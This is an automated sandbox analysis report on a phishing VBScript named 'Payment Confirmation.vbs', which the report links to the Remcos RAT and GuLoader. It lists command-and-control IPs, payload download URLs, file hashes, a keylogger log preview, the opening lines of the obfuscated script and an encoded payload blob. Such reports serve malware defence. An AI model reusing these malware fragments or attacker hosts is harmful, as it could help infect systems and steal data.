                IPDomainCountryFlagASNASN NameMalicious
                103.237.87.161
                unknownunknown
                133587BGNR-AP2BainandCompanySGtrue
                178.237.33.50
                geoplugin.netNetherlands
                8455ATOM86-ASATOM86NLfalse
                103.237.86.247
                unknownunknown
                133587BGNR-AP2BainandCompanySGfalse
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1465864
                Start date and time:2024-07-02 07:49:10 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:18
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Payment Confirmation.vbs
                Detection:MAL
                Classification:mal100.phis.troj.spyw.expl.evad.winVBS@18/13@2/3
                EGA Information:
                • Successful, ratio: 66.7%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 157
                • Number of non-executed functions: 310
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 199.232.210.172
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target powershell.exe, PID 7836 because it is empty
                • Execution Graph export aborted for target powershell.exe, PID 8080 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                01:50:03API Interceptor1x Sleep call for process: wscript.exe modified
                01:50:05API Interceptor131x Sleep call for process: powershell.exe modified
                01:51:14API Interceptor879264x Sleep call for process: wab.exe modified
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                178.237.33.50Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • geoplugin.net/json.gp
                6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • geoplugin.net/json.gp
                tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                • geoplugin.net/json.gp
                TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • geoplugin.net/json.gp
                Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • geoplugin.net/json.gp
                103.237.86.247SOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/qOreedem137.bin
                Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/YckNurPLCcwPGiweiCyGTJ2.bin
                Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247/JrFdfe171.bin
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                bg.microsoft.map.fastly.netRevised Invoice 7389293.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 199.232.210.172
                http://differentia.ruGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://docs.google.com/forms/d/e/1FAIpQLSdxwlJ42E7IP7P7FI5J10LvcZM2xU4rjZus8shJYViiMODIbA/viewform?pli=1Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                http://polyfill.io/Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                https://aradcofeenet1.aradcofeenet1.workers.dev/Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                https://a289.dvq.workers.dev/Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                http://pub-5d5794a1344e4ef09c0d498cb30f8875.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                • 199.232.210.172
                http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                • 199.232.214.172
                https://telegrambot-resolved.pages.dev/Get hashmaliciousUnknownBrowse
                • 199.232.214.172
                https://worker2.kenneth-ho-yk.workers.dev/Get hashmaliciousUnknownBrowse
                • 199.232.210.172
                geoplugin.netVyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 178.237.33.50
                tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                • 178.237.33.50
                TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 178.237.33.50
                Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                BGNR-AP2BainandCompanySGSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Statement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                teb6nb8nmu.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                n7h2Ze4ezf.elfGet hashmaliciousMiraiBrowse
                • 103.237.86.195
                ATOM86-ASATOM86NLSOA.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                Vyuctovani_2024_07-1206812497#U00b7pdf.exeGet hashmaliciousRemcos, GuLoaderBrowse
                • 178.237.33.50
                6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c_payload.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                HUED23EDE5UGRFQ.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                DHL Shipping Document Awb & BL.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 178.237.33.50
                tWitaq427K.exeGet hashmaliciousRemcos, AgentTeslaBrowse
                • 178.237.33.50
                TOP URGENT PURCHASE ORDER SHEET & SPECIFICATIONS.vbsGet hashmaliciousGuLoader, RemcosBrowse
                • 178.237.33.50
                Offer ZI-0428.docGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                cKiTq7RRCn.exeGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                INQUIRY#809676-JULY1.xla.xlsxGet hashmaliciousRemcosBrowse
                • 178.237.33.50
                BGNR-AP2BainandCompanySGStatement Of Account (2).vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                Payment Copy.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                • 103.237.86.247
                YHZb2CeJdY.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                lVlJfRiCLE.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                TKX7tZs372.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                3B3W5byB4W.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                jkeqHGu4is.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                teb6nb8nmu.elfGet hashmaliciousMirai, OkiruBrowse
                • 103.237.87.90
                n7h2Ze4ezf.elfGet hashmaliciousMiraiBrowse
                • 103.237.86.195
                bot.x86-20240414-2238.elfGet hashmaliciousMiraiBrowse
                • 103.237.86.195
                No context
                No context
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:data
                Category:dropped
                Size (bytes):144
                Entropy (8bit):3.3458058208756873
                Encrypted:false
                SSDEEP:3:rhlKlVH2A5wZl5JWRal2Jl+7R0DAlBG45klovDl6v:6lVgb5YcIeeDAlOWAv
                MD5:93CBE83EFB3D0DC375D332FE8425D78B
                SHA1:583C5FF9C305E7EA2036019F7F81B8519CD024A7
                SHA-256:32E70B29DB6D4B086106265309BAEFD978316302A9E210961628E5C9663026E1
                SHA-512:E932257F828B1B5C5BE6D38AE31ACEB6A86A5A8F191062CBD59BEDB8A86ECB5423C0BC3239F25A06637AAB4864DAD3B1BE38A12162098786EF50BFFAEBCD1120
                Malicious:true
                Yara Hits:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                Reputation:low
                Preview:....[.2.0.2.4./.0.7./.0.2. .0.1.:.5.0.:.4.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                Process:C:\Windows\System32\wscript.exe
                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                Category:dropped
                Size (bytes):71954
                Entropy (8bit):7.996617769952133
                Encrypted:true
                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                Process:C:\Windows\System32\wscript.exe
                File Type:data
                Category:dropped
                Size (bytes):328
                Entropy (8bit):3.2418003062782916
                Encrypted:false
                SSDEEP:6:kK1Oi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:kDImsLNkPlE99SNxAhUe/3
                MD5:BB890307024C3FB30A1AF6ABD32FADC2
                SHA1:70099161B9CB58C03B7831F6785FDD0664FAD466
                SHA-256:C90CDFFFD614E0261939B9B91D8B5C53AA86D449BEB87411C9649B6C35F445C4
                SHA-512:2E0FA2FDCBB06C69F88B90CBA9F007094F2BE78295FAFC6CBBCD4C5B2B9641F35AD17AFA2738FED77A327814507F459F2D264B9DFD6708BD4855F2919318567B
                Malicious:false
                Preview:p...... ...........C...(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:JSON data
                Category:dropped
                Size (bytes):962
                Entropy (8bit):5.013811273052389
                Encrypted:false
                SSDEEP:12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
                MD5:18BC6D34FABB00C1E30D98E8DAEC814A
                SHA1:D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
                SHA-256:862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
                SHA-512:8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
                Malicious:false
                Preview:{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:modified
                Size (bytes):11608
                Entropy (8bit):4.8908305915084105
                Encrypted:false
                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9R:9rib4Z1VoGIpN6KQkj2qkjh4iUxsT6YP
                MD5:DD89E182EEC1B964E2EEFE5F8889DCD7
                SHA1:326A3754A1334C32056811411E0C5C96F8BFBBEE
                SHA-256:383ABA2B62EA69A1AA28F0522BCFB0A19F82B15FCC047105B952950FF8B52C63
                SHA-512:B9AFE64D8558860B0CB8BC0FA676008E74F983C4845895E5444DD776A42B584ECE0BB1612D8F97EE631B064F08CF5B2C7622D58A3EF8EF89D199F2ACAEFA8B52
                Malicious:false
                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):1.1940658735648508
                Encrypted:false
                SSDEEP:3:NlllulJnp/p:NllU
                MD5:BC6DB77EB243BF62DC31267706650173
                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                Malicious:false
                Preview:@...e.................................X..............@..........
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with no line terminators
                Category:dropped
                Size (bytes):60
                Entropy (8bit):4.038920595031593
                Encrypted:false
                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                Malicious:false
                Preview:# PowerShell test file to determine AppLocker lockdown mode
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:Extensible storage engine DataBase, version 0x620, checksum 0x06dc6215, page size 32768, DirtyShutdown, Windows version 10.0
                Category:dropped
                Size (bytes):15728640
                Entropy (8bit):0.944362785577381
                Encrypted:false
                SSDEEP:12288:YkCS8rMTkTaTeUZT+T5SFnTKXpmliVvK:YkrTGH
                MD5:7CC4E47A2A02406BCE61D3A3E6F3B7AB
                SHA1:4145781594B77EC3D85EEBFDBEDC4DC17553BBA0
                SHA-256:AFAD50240034691EE643F324B7A96B9B45549F55481BC0068A6ACD18EF23DFA0
                SHA-512:6E8B26126F1FFEC828BC01A61583CF65D4D520C9AFEF2244C0434FB3DEBC86A6D9953F9E87CB6EC8E4367DBE2E1D26C6063A61230EE07EF886A97215B11D5153
                Malicious:false
                Preview:..b.... .......!........v.......{......................d........$...{K..2...|..h...........................0s......{..............................................................................................Y...........eJ......n........................................................................................................... ........"...{..............................................................................................................................................................................................;....{...................................`#..2...|..................h.^.2...|...........................#......h.......................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                Category:dropped
                Size (bytes):2
                Entropy (8bit):1.0
                Encrypted:false
                SSDEEP:3:Qn:Qn
                MD5:F3B25701FE362EC84616A93A45CE9998
                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                Malicious:false
                Preview:..
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):489948
                Entropy (8bit):5.861554524555235
                Encrypted:false
                SSDEEP:12288:1OjspCD1CluFcYAUxPwe4Urg6TVmtO3Au6L6C80Sc9:sCCJkuFhAUqUJmtOQvLb8Q9
                MD5:1653EC29E0D6AFC806000060BBFA5977
                SHA1:D7C467DA7C71CBA74E4DC48CD97B2E60D4BCEEDF
                SHA-256:69E68779CC5F3282405148D1957E9768C0E3CC5849577A5C6C095E556B181428
                SHA-512:84CBB1958CA8CF0A0DC442F39827E09E08267D4831712F5D01E37C17C518C74D252365DB1A9D7BE5F27858ABB2F9655FAE2C25DDF36DBD1FB5AFB04C51BDC312
                Malicious:false
                Preview:cQGb6wIrs7v2+RIA6wJkqXEBmwNcJATrArUn6wJyErky9Yup6wK/0OsC0FWBwZ1JRUxxAZvrAv1lgfHPPtH16wJMoHEBm+sCVuPrAsj2uofyGK/rAhWCcQGb6wJjLnEBmzHKcQGb6wLhyYkUC3EBm+sCLKTR4nEBm3EBm4PBBHEBm+sCMaOB+cq4dwF8zOsCA2dxAZuLRCQE6wJJsHEBm4nD6wKYMXEBm4HDZoNUAHEBm3EBm7o+4ZPbcQGb6wLoqoHyDqADgXEBm3EBm4HyMEGQWusCN85xAZtxAZvrAjBe6wK3VusCZ5qLDBDrAqgMcQGbiQwT6wLLRusC2H1C6wJZrOsCL4GB+gwhBQB10usCAh5xAZuJXCQM6wKl33EBm4HtAAMAAOsCIoLrAidYi1QkCHEBm+sCHMiLfCQE6wJA4XEBm4nrcQGb6wJE5oHDnAAAAHEBm+sCzjlTcQGbcQGbakBxAZvrArLHievrAgBrcQGbx4MAAQAAAMCNAXEBm+sC0tmBwwABAABxAZtxAZtTcQGb6wIMA4nrcQGb6wL51Ym7BAEAAHEBm3EBm4HDBAEAAHEBm+sCqwpT6wKf8esC9qlq/3EBm3EBm4PCBesCWTHrAu14MfZxAZtxAZsxyXEBm3EBm4sa6wI1lnEBm0FxAZtxAZs5HAp19OsCqV9xAZtG6wIwBOsCb9iAfAr7uHXd6wJM5OsCzmWLRAr8cQGbcQGbKfBxAZtxAZv/0usCsd7rAkbEugwhBQDrAiUp6wK8PzHA6wLjAusC1q+LfCQM6wIOBusCQnCBNAd/OjP7cQGb6wLw1oPABOsCZRDrAp9dOdB14+sCMvBxAZuJ+3EBm3EBm//X6wIUSnEBm//BMHKa/bb4gMXM7blD93rKOcwEgOy8XPy7hviAxcyyoAlWevo5zASATV/ponbMdnzFzAQKzWZymoN8B3SRsgrVXhv0/svjei8ishJiI0BHuH4++zawm9771bKPcjo1
                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.194047376753841
                TrID:
                • Visual Basic Script (13500/0) 100.00%
                File name:Payment Confirmation.vbs
                File size:28'900 bytes
                MD5:f72a6162ebf2a0efc89edbbff12cf158
                SHA1:89d7535775bac5a07d9ae7e76e9b397541c0265b
                SHA256:12c916ad80fea271f8d47a0277ce8a8c2090c428adcf2ec538f9f6b6e6d91aea
                SHA512:fa906e47822bdeb66e2a46bb3c399e1fad465741b42a21218c3426a23c99ca65f5d48b4847c1a634c9bd660b2003e2d39eb7ddc5b90f2055a6ae36f904be1acc
                SSDEEP:384:CVRg/BATSpM+Z2AsC7LnCTyHbrF9MEAJIfP3Od85Gmg:Kg5ATSpMsnBnnCTkbrF+43M8Pg
                TLSH:E5D2EE2D1E832FE40E96F77D2A4AB6A741706C7795B2A230DB2C70146C0436E7FBD196
                File Content Preview:....Rapsoderreptatorystet203="Defaitistiske"..Spioniformiatrihalidefris210 = LCAse(Rapsoderreptatorystet203)......Duvetinejakkernes = Sinistruous......Set Gaj = CreateObject("WScript.Shell")......Call regionsplanretningslinies("cls;write 'Vi")..Call regio
                Icon Hash:68d69b8f86ab9a86
                TimestampSource PortDest PortSource IPDest IP
                Jul 2, 2024 07:50:06.418664932 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:06.423537016 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:06.423614025 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:06.423907042 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:06.428625107 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757780075 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757791996 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757802963 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757863998 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.757909060 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757920027 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757961988 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.757966995 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.758001089 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.758044958 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.758074045 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.764355898 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.764368057 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.764425993 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.764530897 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.764575005 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.764646053 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.764657021 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.764695883 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.765010118 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.765022039 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.765033960 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.765045881 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.765064001 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.765121937 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.765508890 CEST8049706103.237.86.247192.168.2.8
                Jul 2, 2024 07:50:07.820678949 CEST4970680192.168.2.8103.237.86.247
                Jul 2, 2024 07:50:07.894422054 CEST8049706103.237.86.247192.168.2.8
